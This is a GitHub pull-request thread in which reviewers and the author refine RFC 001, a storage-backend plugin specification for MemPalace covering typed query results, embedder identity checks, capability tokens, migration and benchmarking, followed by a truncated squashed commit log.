docs: RFC 001 — storage backend plugin specification #743
Conversation
Formalizes the BaseCollection/BaseBackend contract introduced as a seam in #413 into an interchangeability spec that third-party backends can build to. Driven by six in-flight backend PRs (#574, #643, #665, #697, #700, #381) each implementing the interface differently. Key decisions captured: entry-point distribution, typed QueryResult/GetResult replacing Chroma dict shape, daemon-first multi-palace model via PalaceRef, required where-clause subset (incl. $contains), mandatory embedder injection with model-identity validation, capability tokens, shared pytest conformance suite, and a backend-neutral migrate/verify CLI.
Pull request overview
This PR introduces RFC 001, a draft specification for MemPalace storage backend plugins. It formalizes a stable contract so third-party backends can be distributed as mempalace-<name> Python packages and loaded into MemPalace via entry-point discovery, enabling multi-backend / multi-palace (daemon-first) deployments.
Changes:
- Adds a full draft spec defining the BaseCollection/backend lifecycle contract, including typed QueryResult/GetResult shapes.
- Specifies backend discovery/selection (entry points + registry), configuration shape, and capability-token conventions.
- Defines required filter dialect behavior, migration/verification expectations, and a shared backend conformance test suite concept.
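For orientation, a minimal sketch of what loading backends from an entry-point group might look like on the core side. It assumes the `mempalace.backends` group named in the later §10 cleanup PR; the helper name and return shape are illustrative, not part of the spec.

```python
# Minimal sketch (not spec text): loading third-party backends from the
# "mempalace.backends" entry-point group named in the §10 cleanup PR.
# discover_backends() itself is a hypothetical helper, not a real API.
from importlib.metadata import entry_points


def discover_backends() -> dict[str, type]:
    """Map backend name -> backend class for every installed mempalace-<name> package."""
    found: dict[str, type] = {}
    for ep in entry_points(group="mempalace.backends"):  # Python 3.10+ selection API
        found[ep.name] = ep.load()  # e.g. "lance" -> mempalace_lance.LanceBackend
    return found
```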
Copilot review flagged back-references in §1.4 and §6 that still used the pre-skuznetsov-rename names (`$contains_fast`, `sync_capable`, `change_feed`). Updated to the `supports_*` prefix used in the §2.1 capability table.
Incorporates review feedback from skuznetsov (Postgres, #665) and dekoza (Lance, #574) on issue #737:
- §1.5: split 'accepts embeddings=' (signature compliance) from 'persists embeddings as-is' (correctness). Adds a supports_embeddings_passthrough capability; the former is universal, the latter is required to label a migration lossless.
- §1.5: the model identity check becomes a three-state machine (known_match / known_mismatch / unknown) so legacy palaces without recorded identity don't hard-fail on upgrade.
- §1.4: makes explicit that supports_contains_fast is the ONLY performance floor the spec promises; without it callers MUST assume O(n). $contains is a correctness requirement, not a performance one.
- §3.3: clarifies that auto-detect is an upgrade-compat path only, never the selection mechanism for new palaces.
- §8.2: the migrate CLI refuses to run against a target lacking supports_embeddings_passthrough unless --accept-re-embed is passed; the migration record now captures lossless status and model identities.
dekoza
left a comment
Reviewed from the LanceDB (#574) perspective. No show-stoppers — our implementation is already close to the spec's target shape. Notes below.
§1.1 — kwargs-only signatures
Our backends/lance.py already uses kwargs-only on add/upsert, and our BaseCollection ABC in backends/base.py does the same (work done in #575, easily backported). query/get/delete currently use **kwargs catch-all — those need explicit parameter lists to match the spec.
§1.1 — query_embeddings and where_document
Our query() doesn't accept query_embeddings and neither query() nor get() accepts where_document. Both are straightforward for LanceDB:
- `query_embeddings`: skip the embed step, search the vector directly
- `where_document`: same `$contains` path (Tantivy FTS or `LIKE` fallback)
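As a rough, non-authoritative illustration of the kwargs-only signature shape being discussed here, with parameter names and defaults assumed from the Chroma-style API rather than quoted from the RFC:

```python
# Hedged sketch only: a kwargs-only query() with explicit parameters.
# Parameter names/defaults are assumptions based on the discussion, not RFC text.
from typing import Any, Optional, Sequence


class CollectionSketch:
    def query(
        self,
        *,
        query_texts: Optional[Sequence[str]] = None,
        query_embeddings: Optional[Sequence[Sequence[float]]] = None,  # skip the embed step
        n_results: int = 10,
        where: Optional[dict[str, Any]] = None,            # metadata filter (required operator subset)
        where_document: Optional[dict[str, Any]] = None,    # document filter ($contains path)
    ) -> Any:
        """Explicit parameter list instead of a **kwargs catch-all."""
        raise NotImplementedError
```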
§1.1 — update() method
Our BaseCollection and LanceCollection already have an update() method (fetches existing records, merges changes, re-upserts). The spec's BaseCollection does not include update(), though supports_update exists as a capability token. Is update() intentionally excluded from the required interface, or an oversight? If it stays out, we'd keep it as a LanceDB-specific extension — but it seems generally useful.
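For context, the get+merge+upsert default that the thread later converges on (§1.2 in the follow-up commit) might look roughly like this; the `get()`/`upsert()` keyword shapes and result attributes are assumptions.

```python
# Hedged sketch of a non-atomic default update(): fetch existing records,
# merge the changes, re-upsert. Written as it would appear as a method body
# inside the collection ABC; keyword shapes and result attributes are assumed.
from typing import Any, Optional, Sequence


def update(
    self,
    *,
    ids: Sequence[str],
    documents: Optional[Sequence[str]] = None,
    metadatas: Optional[Sequence[dict[str, Any]]] = None,
) -> None:
    existing = self.get(ids=list(ids))
    merged_docs = list(documents) if documents is not None else list(existing.documents)
    merged_metas: list[dict[str, Any]] = []
    for i, old in enumerate(existing.metadatas or [{} for _ in ids]):
        merged = dict(old or {})
        if metadatas is not None and metadatas[i]:
            merged.update(metadatas[i])  # partial update: only supplied keys change
        merged_metas.append(merged)
    self.upsert(ids=list(ids), documents=merged_docs, metadatas=merged_metas)
```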
§1.3 — Typed results
Our return shapes already match QueryResult/GetResult field structure. Migration is wrapping dict construction in dataclass constructors. No concern.
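To make the "wrap in dataclass constructors" point concrete, a hedged sketch; field names mirror the Chroma dict shape and are assumptions rather than the RFC's exact definition.

```python
# Hedged sketch of a typed query result. Field names mirror the Chroma dict
# shape (ids/documents/metadatas/distances) and are assumptions, not spec text.
from dataclasses import dataclass
from typing import Any, Optional


@dataclass
class QueryResult:
    ids: list[list[str]]
    documents: list[list[str]]
    metadatas: list[list[dict[str, Any]]]
    distances: Optional[list[list[float]]] = None


def to_typed(raw: dict[str, Any]) -> QueryResult:
    """The migration is mostly mechanical: same values, wrapped in a constructor."""
    return QueryResult(
        ids=raw["ids"],
        documents=raw["documents"],
        metadatas=raw["metadatas"],
        distances=raw.get("distances"),
    )
```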
§1.5 — Three-state model identity
We persist embedding_model per-record in metadata_json but not at collection level. Spec wants collection-level persistence + check on open. LanceDB supports table-level metadata via Arrow schema metadata — clean fit. The unknown state for legacy palaces is the right call; hard-failing on upgrade would break existing users.
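A hedged sketch of the three-state check described here; the state names come from the thread, while the function and argument names are hypothetical.

```python
# Hedged sketch of the three-state model-identity check. The state names
# (known_match / known_mismatch / unknown) come from the thread; the function
# and argument names are hypothetical.
from enum import Enum
from typing import Optional


class IdentityState(Enum):
    KNOWN_MATCH = "known_match"
    KNOWN_MISMATCH = "known_mismatch"
    UNKNOWN = "unknown"


def check_model_identity(recorded: Optional[str], configured: str) -> IdentityState:
    """Compare the identity persisted at collection level with the injected embedder's."""
    if recorded is None:
        # Legacy palace with no recorded identity: warn, don't hard-fail;
        # record on the next successful write / reindex / migration.
        return IdentityState.UNKNOWN
    if recorded == configured:
        return IdentityState.KNOWN_MATCH
    return IdentityState.KNOWN_MISMATCH
```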
§2.3 — BaseBackend class
We already have LanceBackend in backends/lance.py with a get_collection() factory method (from #575, easily backported to #574). It currently takes palace_path: str — adapting to PalaceRef is straightforward. It does not yet subclass a BaseBackend ABC (spec §2.3), but the method shape is close.
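For orientation only, a heavily hedged guess at what a PalaceRef-style value object could carry; `id` is the only attribute attested in the thread, and the other fields are assumptions about what replacing a raw `palace_path: str` implies.

```python
# Heavily hedged guess at a PalaceRef-shaped value object. Only `id` is
# mentioned in the thread; `path` and `namespace` are assumptions.
from dataclasses import dataclass
from pathlib import Path
from typing import Optional


@dataclass(frozen=True)
class PalaceRef:
    id: str                        # uniqueness scope is raised as an open question later
    path: Optional[Path] = None    # file-backed backends (Chroma, LanceDB)
    namespace: Optional[str] = None
```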
§3.3 — Auto-detection
Our backends/__init__.py already has detect_backend() sniffing for .lance directories. Adapting to a BaseBackend.detect(path) -> bool classmethod is trivial. Agree with the spec's framing that auto-detection is a migration compatibility path, not a selection mechanism.
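A small sketch of that classmethod shape, assuming the same `.lance`-directory sniff the current `detect_backend()` performs; the body is illustrative.

```python
# Hedged sketch of the auto-detection hook: the classmethod shape
# (detect(path) -> bool) is from the thread, the body is illustrative.
from pathlib import Path


class LanceBackend:
    @classmethod
    def detect(cls, path: Path) -> bool:
        """Return True if `path` looks like an existing LanceDB-backed palace."""
        # Same sniff the current backends/__init__.py detect_backend() does:
        # any *.lance directory under the palace path.
        return any(p.is_dir() for p in Path(path).glob("*.lance"))
```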
§6 — Sync compatibility note
Our sync implementation uses a _raw=True flag on upsert() to skip sync metadata injection during sync apply. The spec's BaseCollection.upsert() has no such parameter, which is correct — sync concerns should not leak into the collection contract. This means we need to refactor sync injection out of LanceCollection into a wrapper layer, which aligns with §6's "sync is a separate subsystem" stance. Wanted to flag this since other backends implementing sync will face the same design question.
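One hypothetical way the wrapper-layer refactor could look, with sync metadata injected outside the collection contract; all names here are illustrative, and `sync_version` stands in for whatever the sync subsystem actually stamps.

```python
# Hypothetical sketch: sync-metadata injection moved into a wrapper so the
# spec-shaped upsert() needs no _raw=True escape hatch. Names are illustrative.
from typing import Any, Optional, Sequence


class SyncAwareCollection:
    """Wraps a spec-shaped collection; normal writes get sync metadata stamped."""

    def __init__(self, inner: Any, sync_clock: Any) -> None:
        self._inner = inner
        self._clock = sync_clock

    def upsert(
        self,
        *,
        ids: Sequence[str],
        documents: Sequence[str],
        metadatas: Optional[Sequence[dict[str, Any]]] = None,
    ) -> None:
        base = metadatas or [{} for _ in ids]
        stamped = [dict(m or {}, sync_version=self._clock.tick()) for m in base]
        self._inner.upsert(ids=ids, documents=documents, metadatas=stamped)

    def apply_remote(self, *, ids, documents, metadatas) -> None:
        # Sync-apply path: pass records through untouched (the old _raw=True behavior).
        self._inner.upsert(ids=ids, documents=documents, metadatas=metadatas)
```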
§10 — Cleanup gating
+1 on landing the Chroma direct-import cleanup before backend PRs rebase. The seven files importing chromadb directly would break any pure-Lance deployment. This cleanup benefits all backend authors equally.
§11 — Alignment effort for #574
Assessment is accurate. We already have backends/ with BaseCollection ABC, LanceBackend, and kwargs-only signatures (work from #575, easily backported). Remaining work: explicit param lists on query/get/delete (instead of **kwargs), typed results, $contains/where_document, collection-level model identity, PalaceRef adoption, conformance test subclass, sync injection refactor, and package extraction to mempalace-lance. All small-to-medium. No architectural conflicts.
§12 — Open questions
- `changes_since` with collection filter — yes, useful. Our sync tracks changes per-table; filtering by collection name is natural.
- Per-palace capabilities — worth having. `supports_contains_fast` depending on whether an FTS index exists is a real case for us.
- `run_maintenance` return shape — structured return preferred (one possible shape is sketched below). LanceDB compaction can report fragment count before/after and bytes reclaimed, useful for operator dashboards and benchmark reporting.
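A possible structured return shape for `run_maintenance()`, sketched from the fragment-count and bytes-reclaimed example above; every field name is an assumption.

```python
# Hedged sketch of a structured run_maintenance() return, built from the
# LanceDB compaction example above; all field names are assumptions.
from dataclasses import dataclass


@dataclass
class MaintenanceReport:
    kind: str                 # e.g. "compact"
    fragments_before: int
    fragments_after: int
    bytes_reclaimed: int
    duration_seconds: float
```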
Reviewed the actual RFC diff from the Postgres / `pg_sorted_heap` (#665) perspective. Three small spec-clarity points I would consider before backend authors start rebasing:
The Goals section says migration between backends happens "without data loss", but §8.2 only promises a lossless migration when the target backend's capabilities allow it and falls back to re-embedding otherwise. The Goals wording should mirror §8.2 so it doesn't overpromise.
§1.5 says backends MUST NOT hardcode models and must validate model identity/dimension, but §2.1 / §5 allow a `server_embedder` capability for backends that embed server-side. As written, that reads like an implicit escape hatch from the identity/dimension rules; worth stating explicitly that `server_embedder` backends are bound by the same checks.
§7.3 says benchmarks should run explicit maintenance kinds, but there is currently no way for a harness to discover which kinds a backend actually supports, or what should happen when an unsupported kind is requested, so kind names end up being guessed.

None of these change the shape of the RFC. They are mostly guardrails to keep the spec precise once implementations begin targeting it.
Reviewed from the perspective of a 134K-drawer production deployment on the Chroma backend, with experience evaluating LanceDB (via Karta's embedded LanceDB + SQLite architecture).
No show-stoppers. This is the right time to formalize the backend contract — the six-way divergence is already causing friction. Notes below.
§1.3 — Typed results (migration cost for existing forks/consumers)
This is a breaking change for anyone with code touching mcp_server.py or searcher.py that assumes dict returns. My fork has ~20 changes across those files — all dict-shaped. The migration path is clear (wrap in dataclass constructors, same as dekoza noted), but the blast radius is worth calling out: it's not just backend authors who need to update, it's everyone downstream who consumes query results. A compatibility shim (.to_dict() on the result types) during the transition would make the upgrade gentler for plugin authors and forks.
§1.5 — Three-state model identity is exactly right
My palace has 134K drawers with no recorded embedder identity. Hard-failing on upgrade would brick every pre-v1 palace. The unknown → warn → record-on-next-write path is the correct design. One detail: the spec says the identity is recorded "on the next successful write, reindex, or migration." For read-heavy deployments that rarely write new drawers, this means the palace could stay in unknown state indefinitely. Consider also recording on explicit mempalace verify or mempalace status (read-only operations that already touch the collection) so operators can resolve it without forcing a write.
§2.5 — Concurrency guarantee matches real usage
The spec says backends can assume single-thread access per collection, with core serializing per palace. This matches how the MCP server actually works today — good call. My fork added threading.Lock to the graph cache (#661) because build_graph() was the one place concurrent access was possible. The per-palace serialization guarantee would have made that unnecessary. Worth documenting this guarantee prominently so backend authors don't over-synchronize.
§7.3 — Benchmark methodology is the most underrated section
At 134K drawers on Chroma, I've hit the HNSW pathology firsthand — the graph's on-disk size and query latency behave very differently before and after compaction, and after external writes that invalidate the in-memory index (the exact problem my stale HNSW mtime detection fix addresses in #663). The three-phase benchmark requirement (post-bulk-load, post-background-maintenance, post-explicit-maintenance) would have caught the performance cliff I found empirically. Strong +1 on maintenance_state() being part of the published numbers.
§8 — Migration at scale
At 134K drawers, re-embedding is not a minor cost — it's hours of compute depending on the model. The lossless vs re-embed distinction and the --accept-re-embed explicit opt-in are the right design. One request: mempalace migrate should report progress (rows migrated / total, ETA) for large palaces. A 134K-drawer migration that runs silently for hours will get killed by impatient operators.
§10 — Cleanup prerequisite will affect fork contributors
My fork's mcp_server.py imports chromadb directly for the BLOB seq_id repair (#664) and mtime-based cache invalidation (#663). Both are deeply Chroma-specific. The cleanup PR routing all callers through BaseCollection is the right gating decision, but it will require Chroma-specific fixups to move behind the backend boundary. Backend-specific maintenance operations (like BLOB repair) might need a BaseBackend.repair() or similar escape hatch — otherwise they end up as out-of-band scripts that bypass the abstraction.
§12 — Open questions
- Per-palace capabilities — yes. `supports_contains_fast` depending on whether an FTS index exists is a real case.
- I'd add `supports_mtime_detection` or similar for backends where external-write detection is possible (Chroma via SQLite mtime) vs not (server-mode backends where the filesystem isn't local). My #663 fix is Chroma-specific precisely because mtime detection only makes sense for local file-backed stores.
Addresses the actual spec defects flagged in #743 review, ignoring operator-UX asks that are not plugin-contract concerns.
- Goal #3: 'without data loss' → mirrors §8.2's capability-conditional lossless-vs-reembed framing. No more overpromise.
- §1.5: `server_embedder` is no longer an implicit escape hatch from identity/dimension rules. Such backends MUST expose an effective identity via `effective_embedder_identity()` and are bound by the same three-state check.
- §7.3: adds a `maintenance_kinds: ClassVar[frozenset[str]]` advertisement mechanism (sketched below). `run_maintenance(kind)` must raise UnsupportedMaintenanceKindError for unadvertised kinds. The benchmark harness reads this set rather than guessing kind names. Reserves `analyze`/`compact`/`reindex` as well-defined names.
- §1.2: adds `update()` as an optional method with a default get+merge+upsert implementation. §2.1: `supports_update` is redefined to gate atomic single-round-trip semantics (not mere capability), since the default impl already supports partial updates.

Operator asks explicitly NOT adopted (diplomatic shims, not contract defects): `.to_dict()` compat on typed results, migration progress reporting, `BaseBackend.repair()` separate from `run_maintenance`, per-palace capability variance, identity recording on read-only ops.
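A minimal sketch of that §7.3 advertisement mechanism; the names `maintenance_kinds`, `run_maintenance`, `UnsupportedMaintenanceKindError` and the reserved kinds come from the commit message above, while the class and return shape are illustrative.

```python
# Hedged sketch of the §7.3 maintenance-kind advertisement. Only the names
# maintenance_kinds / run_maintenance / UnsupportedMaintenanceKindError and the
# reserved kinds are from the thread; the class and return shape are illustrative.
from typing import Any, ClassVar


class UnsupportedMaintenanceKindError(Exception):
    pass


class ExampleBackend:
    # Advertise only the kinds this backend actually implements.
    maintenance_kinds: ClassVar[frozenset[str]] = frozenset({"compact", "reindex"})

    def run_maintenance(self, kind: str) -> dict[str, Any]:
        if kind not in self.maintenance_kinds:
            raise UnsupportedMaintenanceKindError(kind)
        # ... perform the maintenance, then return something structured
        return {"kind": kind, "status": "ok"}
```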
Thanks @skuznetsov @dekoza @jphein — substantive reviews on all sides. Commit 922aa99 closes the four spec defects the reviews surfaced. A number of reasonable operator asks are explicitly not being adopted; both are explained below so the boundary is clear for anyone implementing against this.

Adopted — spec defects

1. Goals wording (skuznetsov) — Goal 3 now mirrors §8.2 instead of overpromising "without data loss." The spec delivers lossless migration when capabilities allow, re-embedding otherwise. Both are explicit; neither is hidden.
2. `server_embedder` (skuznetsov) — §1.5 no longer reads as an escape hatch: backends that embed server-side must expose an effective identity via `effective_embedder_identity()` and are bound by the same three-state identity/dimension check.
3. Maintenance kinds (skuznetsov) — §7.3 now carries the `maintenance_kinds` advertisement; `run_maintenance(kind)` raises UnsupportedMaintenanceKindError for unadvertised kinds, the benchmark harness reads the advertised set instead of guessing names, and `analyze`/`compact`/`reindex` are reserved with defined semantics.
4. `update()` (dekoza) — §1.2 adds `update()` as an optional method with a default get+merge+upsert implementation; `supports_update` now gates atomic single-round-trip semantics rather than mere presence.

Not adopted — operator comfort, not plugin-contract concerns

These are all reasonable asks, and I want to be explicit that they're not dismissed because they're wrong — they're not adopted because they don't belong in this spec. A well-engineered plugin contract has a small, stable surface. Layering operator-UX conveniences into the core interface makes it worse for every future backend author.
Net

Four spec edits, small and targeted. The contract is tighter for it. The rejected items are good ideas for the implementations — CLI progress, fork-friendly shims, richer operator tooling — they just don't live in the plugin contract. #743 is ready for another look.
Thanks, this addresses my Postgres / `pg_sorted_heap` points.
#757 landed mtime/inode cache invalidation and mempalace_reconnect in mcp_server._get_client(). Both are Chroma-specific (stat of chroma.sqlite3). They should migrate into ChromaBackend.get_collection and ChromaBackend.close_palace during the §10 cleanup so the freshness contract lives inside the backend, not in the caller.
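A hedged sketch of what that freshness check might look like once it lives inside the backend; only the stat of `chroma.sqlite3` and the mtime/inode idea are from the thread, and the attribute and method names are hypothetical.

```python
# Hedged sketch: mtime/inode freshness check living inside ChromaBackend so
# callers never stat chroma.sqlite3 themselves. Attribute/method names are
# hypothetical; only the stat-of-chroma.sqlite3 idea is from the thread.
import os
from typing import Optional


class ChromaBackendSketch:
    def __init__(self) -> None:
        self._client = None
        self._db_stat: Optional[tuple[int, int]] = None  # (st_mtime_ns, st_ino)

    def _refresh_client_if_stale(self, palace_path: str) -> None:
        st = os.stat(os.path.join(palace_path, "chroma.sqlite3"))
        current = (st.st_mtime_ns, st.st_ino)
        if self._db_stat is not None and self._db_stat != current:
            self._client = None  # external write detected: drop the cached client
        self._db_stat = current
```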
Prerequisite for RFC 001 (plugin spec, #743). Removes every direct `import chromadb` outside the ChromaDB backend itself so the core modules depend only on the backend abstraction layer. Extends ChromaBackend with make_client, get_or_create_collection, delete_collection, create_collection, and backend_version. Adds update() to the BaseCollection contract. Non-backend callers (mcp_server, dedup, repair, migrate, cli) now go through the abstraction; tests patch ChromaBackend instead of chromadb. With this landed, the RFC 001 spec can be enforced and PalaceStore (#643) can ship as a plugin without touching core modules.
Quick coordination question from the PostgreSQL / pg_sorted_heap backend side: Is RFC 001 now stable enough to use as the target contract for reworking #665, or would you prefer that implementation PRs wait until #743 is merged and the §10 backend cleanup follow-up starts/lands? From my side, the expected #665 rewrite would target the RFC shape directly:
I’m asking to avoid rebasing the current conflicting branch into an intermediate shape if the intended path is now RFC-first.
Read the full spec. From the multi-tenant hosted side (#697), this looks solid.

Works for us

Questions

1. Namespace isolation — security boundary or naming convention? For us, namespace is a tenant isolation boundary. When a user searches across personal + team vaults, the sidecar resolves which namespaces to query based on a gateway-authorized team_ids list. A team namespace that isn't in that list gets rejected. §4.4 says "the backend uses it as given" — should backends also enforce namespace isolation, or is that purely the caller's job?
2. PalaceRef.id uniqueness scope — unique globally or per backend instance?
3. Typed results (§1.3) — hard cutover? Is there a transition period, or do all callers need to migrate from Chroma dicts in one go? We have 30 MCP tool functions consuming dict shapes.
4. §7.4 NAMESPACE_MEMPALACE — worth assigning now; the placeholder blocks Qdrant PRs.
5. §10 mcp_server caching — we hit a related bug (collection cache bleed between tenants). Moving caching into the backend, as §10 proposes, would have prevented it.

#697 alignment
…nd registry (RFC 001 §10)

Advances RFC 001 §10 cleanup so backend-author PRs (#574 LanceDB, #665 Postgres, #700 Qdrant, #697 hosted, #643 PalaceStore, #381 Qdrant) have a stable target to align against.

Scope (this PR):
- Typed QueryResult / GetResult dataclasses replace Chroma's dict shape at the BaseCollection boundary (§1.3). A transitional _DictCompatMixin keeps existing callers working while the attribute-access migration proceeds.
- BaseCollection is now kwargs-only across add/upsert/query/get/delete/update with ABC defaults for estimated_count/close/health and a non-atomic default update() (§1.1–1.2).
- PalaceRef replaces raw path strings at the backend boundary (§2.2).
- BaseBackend ABC with get_collection/close_palace/close/health/detect (§2.3).
- mempalace.backends entry-point group + in-tree registry with resolve_backend_for_palace priority order matching §3.2–3.3.
- ChromaCollection normalizes chroma returns into typed results; unknown where-clause operators raise UnsupportedFilterError (no silent drop, §1.4 — illustrated below).
- ChromaBackend absorbs the inode/mtime client-cache freshness check previously duplicated in mcp_server._get_client() (§10 + PR #757).
- searcher.py migrated to typed-attribute access as the reference call site; remaining callers land in a follow-up.
- pyproject: chroma registered via [project.entry-points."mempalace.backends"].

Out of scope (explicit follow-ups):
- Full caller migration off the dict-compat shim across palace.py, mcp_server.py, miner.py, convo_miner.py, dedup.py, repair.py, exporter.py, palace_graph.py, cli.py, closet_llm.py.
- Embedder injection + three-state EmbedderIdentityMismatchError check (§1.5).
- maintenance_state() / run_maintenance() benchmark hooks (§7.3).
- AbstractBackendContractSuite full coverage (§7.1–7.2).
- mempalace migrate / mempalace verify CLI rewrites through BaseCollection (§8).

Tests: 970 passed (up from 967 on develop); new coverage for typed results, empty-result outer-shape preservation, $regex rejection, registry lookup, priority resolver, and PalaceRef-kwarg ChromaBackend.get_collection.

Refs: #743 (RFC 001), #989 (RFC 002 tracking issue).
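To illustrate the "no silent drop" rule from that list, a hedged sketch of rejecting unknown where-clause operators; the supported-operator set shown is illustrative, and only `$contains` support and the `$regex` rejection are attested here.

```python
# Hedged sketch of §1.4 "no silent drop": unknown where-clause operators raise
# instead of being ignored. The supported set shown is illustrative; only
# $contains support and $regex rejection are attested in the thread.
from typing import Any


class UnsupportedFilterError(Exception):
    pass


_SUPPORTED_OPS = {"$eq", "$ne", "$in", "$nin", "$and", "$or", "$contains"}


def validate_where(clause: dict[str, Any]) -> None:
    for key, value in clause.items():
        if key.startswith("$") and key not in _SUPPORTED_OPS:
            raise UnsupportedFilterError(f"unsupported operator: {key}")  # e.g. $regex
        if isinstance(value, dict):
            validate_where(value)
        elif isinstance(value, list):
            for item in value:
                if isinstance(item, dict):
                    validate_where(item)
```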
Scanned all 233 open upstream PRs today against our open PRs and fork-ahead / planned-work items. Findings merged into README:
- P2 (decay) and P3 Tier-0 (LLM rerank): both covered by MemPalace#1032 (@zackchiutw, MERGEABLE, 2026-04-19 — Weibull decay + 4-stage rerank pipeline). Older, simpler version at MemPalace#337. Dropped as fork work; watching MemPalace#1032.
- P7 (alternative storage): formally out of scope. RFC 001 MemPalace#743 (@igorls) defines the plugin contract; four backend PRs already in flight (MemPalace#700, MemPalace#381 Qdrant; MemPalace#574, MemPalace#575 LanceDB). Fork consumes, does not rebuild.
- P0 (multi-label tags): still a fork/upstream candidate. MemPalace#1033 (@zackchiutw) ships adjacent privacy-tag + progressive disclosure but not the full multi-label scheme.
- Merged MemPalace#1023 section acknowledges complementary MemPalace#976 (felipetruman), which adds broader mine_global_lock() + HNSW num_threads pin.

Gives future-us a map so we don't re-file MemPalace#1036-style duplicates.
bensig
left a comment
Reviewed in full. This is the right shape and depth for a 1.0 spec — closes the open decisions deliberately deferred by #413, calls out the in-flight PR impact concretely, names the cleanup work it depends on, and stays out of scope where deferral is honest (sync, wire protocol, embedder).
Approving on merit. One mechanical block + a few suggestions worth folding in before this lands.
Block
- §7.4 `NAMESPACE_MEMPALACE = uuid.UUID("TO-BE-ASSIGNED-ONCE-FOR-ALL-TIME")` — placeholder. Needs an actual UUID assigned and recorded in the spec text before this merges, since the section explicitly says "fixed at spec v1 adoption." Suggest `python -c "import uuid; print(uuid.uuid4())"` and pin it.
Suggestions (small, fold-in-able)
- §5 references "a separate RFC" for the embedder contract. Worth either filing the tracking issue and linking it from this section, or marking the dependency as a parallel work item in §13. Right now the spec hard-depends on an external contract that has no anchor.
- §4.2 env var splitting rule for hyphenated/underscored backend names. The example uses backend name "pg_prod" in §4.1 but `MEMPALACE_POSTGRES_DSN` in §4.2. If users name a backend "pg_prod", does the env shape become `MEMPALACE_PG_PROD_`? `MEMPALACE_PG-PROD_`? Or is `MEMPALACE__` keyed by backend type, not instance? One sentence would close it.
- §3.3 priority + global env interaction. A user with `MEMPALACE_BACKEND=postgres` set globally who opens a palace with on-disk Chroma artifacts gets postgres (env wins, auto-detect skipped). That's correct behavior, but worth one sentence calling it out — "setting MEMPALACE_BACKEND globally overrides existing-palace auto-detection; users opening pre-existing palaces should leave it unset." Saves a real support incident.
- §9 major-version mismatch error. "Refuses to load a backend declaring a different major version." Worth a one-line example of the error message shape so backend authors know what their users will see when they install an incompatible version. Drop a `BackendVersionMismatchError(...)` example next to the rule (one possible shape is sketched after this list).
- §7.4 reserved maintenance kinds. `"analyze"` / `"compact"` / `"reindex"` are reserved with required semantics. Consider naming the non-required implementation pattern: e.g., "a backend that has no analogue for a kind MUST omit it from `maintenance_kinds` rather than declaring it as a no-op." Otherwise nothing prevents a benchmark harness from seeing `"analyze"` in `maintenance_kinds` and assuming it does what the spec says when the implementation is empty.
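On the §9 point, one hedged example of what that error shape could look like; the exception name comes from the suggestion above, while the message wording and constructor fields are illustrative.

```python
# Hedged example of the §9 version-mismatch error shape; the exception name is
# from the review comment above, the message wording and fields are illustrative.
class BackendVersionMismatchError(RuntimeError):
    def __init__(self, backend: str, declared: str, required: str) -> None:
        super().__init__(
            f"backend '{backend}' declares spec v{declared}, "
            f"but this MemPalace requires spec v{required}; "
            f"install a compatible release of mempalace-{backend}"
        )
```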
Strengths
- Capability-token design is sharp. The signature-compliance vs semantic-guarantee split (`supports_embeddings_in` vs `supports_embeddings_passthrough`) is exactly the right granularity. Same for the `server_embedder` carve-out in §1.5 — `server_embedder` documents where embedding happens, never suspends the dimension/identity safety contract. Beautifully written paragraph; reads like it survived a real ambiguity.
- Three-state embedder identity check (`known_match` / `known_mismatch` / `unknown`) is the kind of detail that prevents a real upgrade incident. Hard-failing legacy palaces from #413 would be hostile; this gives them a clean transition path with a warning.
- §10 cleanup prerequisite is honest. Names the 7 files still importing `chromadb` directly with line numbers, calls out `mcp_server._get_client()` as a Chroma-specific cache that needs to migrate into `ChromaBackend.get_collection()` per §2.5. Most RFCs hand-wave this section; this one names the actual work.
- Migration honesty (§8.2). Lossless vs re-embed is explicit; `--accept-re-embed` is required, written to the migration log, never silent. The pairing requirement (`supports_migration_export` source-side + `supports_embeddings_passthrough` target-side) prevents a class of subtle silent-degrade bugs.
- Benchmark methodology in §7.3 is rare to see in an RFC and prevents the un-`ANALYZE`'d-Postgres-vs-settled-Chroma anti-pattern. Reserved kind names + three-phase publishing requirement + harness MUST NOT assume kind names — that's the level of rigor this saves you from re-litigating later.
- §3.3 auto-detection scoped tightly. "Strictly a migration/upgrade compatibility path, not a general selection mechanism." Explicit configuration always wins. Right call.
- §11 in-flight PR impact table is concrete. Shows this spec was written with the actual outstanding work in mind, not in a vacuum. Each PR has a one-line align-effort estimate.
- §13 rollout sequence is realistic — cleanup first, spec second, Chroma updated third, in-flight rebased fourth, migration CLI fifth. Matches what's actually achievable.
Observation, not actionable
- RFC 002 (source adapter plugin spec) shipped in v3.3.2 ahead of RFC 001. The numbering doesn't imply ordering, but it's worth noting Igor is comfortable shipping concrete implementation ahead of formal RFC merge. The §10 cleanup discipline + §11 PR impact table here suggest that's a deliberate pattern, not drift. Approving on the strength of that.
Once the UUID gets assigned and the four small clarifications are folded in, this is ready to merge as the contract that the v4.0-alpha backend work targets. Status can move from Draft to Accepted with a date.
* feat: add Hindi language support to i18n module * Create SECURITY.md This PR introduces a standard SECURITY.md policy file to the repository. While reviewing the codebase, I noticed there wasn't a defined channel for the private, responsible disclosure of security vulnerabilities. Adding this policy helps protect the project by guiding researchers to report bugs privately rather than in public issues. I highly recommend merging this and enabling GitHub's "Private Vulnerability Reporting" feature in your repository settings. I currently have some security findings I would like to share with the maintainers securely once a private channel or contact method is established. * fix: save hook auto-mines transcript without MEMPAL_DIR (#840) TDD: test written first, failed, then fixed. Problem: save hook says "saved in background" but MEMPAL_DIR defaults to empty, so nothing actually mines. Users get no auto-save despite the hook firing every 15 messages. Fix: use TRANSCRIPT_PATH (received from Claude Code in the hook's JSON input) to discover the session directory. Mine that directory automatically. MEMPAL_DIR is still supported as override but no longer required. Also fixed: bare python3 → $(command -v python3) for nohup safety. Co-authored-by: Claude Opus 4.6 (1M context) <[email protected]> * release: v3.3.0 (#839) * fix: add file-level locking to prevent multi-agent duplicate drawers Root cause: when multiple agents mine simultaneously, both pass file_already_mined() check, both delete+insert the same file's drawers, creating duplicates or losing data. Fix: mine_lock() in palace.py — cross-platform file lock (fcntl on Unix, msvcrt on Windows). Both miner.py and convo_miner.py now lock per-file during the delete+insert cycle and re-check after acquiring the lock. Tested: - Lock acquires and releases correctly - Second agent blocks until first releases (0.25s wait) - 33/33 existing tests pass - Cross-platform: fcntl (macOS/Linux), msvcrt (Windows) Based on v3.2.0 tag. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * fix: strip system tags, hook output, and Claude UI chrome from drawers normalize.py now strips before filing: - <system-reminder>, <command-message>, <command-name> tags - <task-notification>, <user-prompt-submit-hook>, <hook_output> 